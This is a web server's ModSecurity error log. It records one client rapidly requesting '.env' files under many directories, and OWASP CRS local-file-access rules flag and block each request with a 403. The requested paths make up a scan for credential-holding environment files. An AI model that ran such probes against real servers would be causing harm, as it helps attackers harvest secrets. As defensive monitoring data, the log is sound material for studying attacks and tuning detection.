[Mon May 11 18:03:20.800618 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/assets/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh5AAAAQ4"]
[Mon May 11 18:03:20.800847 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/assets/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh5AAAAQ4"]
[Mon May 11 18:03:20.801166 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yEWKUxpmnkK7zHyh5AAAAQ4"]
[Mon May 11 18:03:21.048015 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/uploads/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh5gAAAQ4"]
[Mon May 11 18:03:21.048264 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/uploads/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh5gAAAQ4"]
[Mon May 11 18:03:21.048531 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yUWKUxpmnkK7zHyh5gAAAQ4"]
[Mon May 11 18:03:21.249806 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/internal/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6AAAAQ4"]
[Mon May 11 18:03:21.249994 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/internal/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6AAAAQ4"]
[Mon May 11 18:03:21.250301 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yUWKUxpmnkK7zHyh6AAAAQ4"]
[Mon May 11 18:03:21.444975 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/tools/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6gAAAQ4"]
[Mon May 11 18:03:21.445309 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/tools/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6gAAAQ4"]
[Mon May 11 18:03:21.445672 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yUWKUxpmnkK7zHyh6gAAAQ4"]
[Mon May 11 18:03:21.639206 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/scripts/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6wAAAQ4"]
[Mon May 11 18:03:21.639430 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/scripts/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh6wAAAQ4"]
[Mon May 11 18:03:21.639697 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yUWKUxpmnkK7zHyh6wAAAQ4"]
[Mon May 11 18:03:21.821536 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bin/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh7AAAAQ4"]
[Mon May 11 18:03:21.821764 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bin/.env"] [unique_id "agH9yUWKUxpmnkK7zHyh7AAAAQ4"]
[Mon May 11 18:03:21.822052 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yUWKUxpmnkK7zHyh7AAAAQ4"]
[Mon May 11 18:03:22.116542 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sbin/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh7QAAAQ4"]
[Mon May 11 18:03:22.116782 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sbin/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh7QAAAQ4"]
[Mon May 11 18:03:22.117123 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ykWKUxpmnkK7zHyh7QAAAQ4"]
[Mon May 11 18:03:22.381171 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/local/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh7gAAAQ4"]
[Mon May 11 18:03:22.381402 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/local/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh7gAAAQ4"]
[Mon May 11 18:03:22.381683 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ykWKUxpmnkK7zHyh7gAAAQ4"]
[Mon May 11 18:03:22.554427 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh8QAAAQ4"]
[Mon May 11 18:03:22.554678 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh8QAAAQ4"]
[Mon May 11 18:03:22.554985 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ykWKUxpmnkK7zHyh8QAAAQ4"]
[Mon May 11 18:03:22.751613 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dashboard/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh8gAAAQ4"]
[Mon May 11 18:03:22.751850 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dashboard/.env"] [unique_id "agH9ykWKUxpmnkK7zHyh8gAAAQ4"]
[Mon May 11 18:03:22.752141 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ykWKUxpmnkK7zHyh8gAAAQ4"]
[Mon May 11 18:03:23.010820 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/panel/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-QAAAQ4"]
[Mon May 11 18:03:23.011060 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/panel/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-QAAAQ4"]
[Mon May 11 18:03:23.011410 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9y0WKUxpmnkK7zHyh-QAAAQ4"]
[Mon May 11 18:03:23.227610 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-gAAAQ4"]
[Mon May 11 18:03:23.227848 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-gAAAQ4"]
[Mon May 11 18:03:23.229673 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9y0WKUxpmnkK7zHyh-gAAAQ4"]
[Mon May 11 18:03:23.402334 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/erp/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-wAAAQ4"]
[Mon May 11 18:03:23.402565 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/erp/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh-wAAAQ4"]
[Mon May 11 18:03:23.402853 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9y0WKUxpmnkK7zHyh-wAAAQ4"]
[Mon May 11 18:03:23.604692 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shop/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh_AAAAQ4"]
